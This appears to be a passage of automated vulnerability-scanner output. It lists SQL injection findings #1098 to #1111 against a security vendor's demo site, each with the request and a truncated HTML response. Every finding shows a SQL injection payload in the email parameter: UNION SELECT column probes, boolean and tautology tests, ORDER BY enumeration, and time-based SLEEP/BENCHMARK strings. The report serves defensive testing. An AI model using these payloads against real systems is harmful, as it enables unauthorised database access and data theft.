href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1098\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1099\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 7506=9091 AND (5913=5913\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1100\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1101\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1102\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'=0--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1103\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io WHERE 1=1 AND 1=0#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1104\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1105\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1106Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 9#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1107\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1108\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1109\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1110\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4,5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1111\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin') or ('1'='1'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 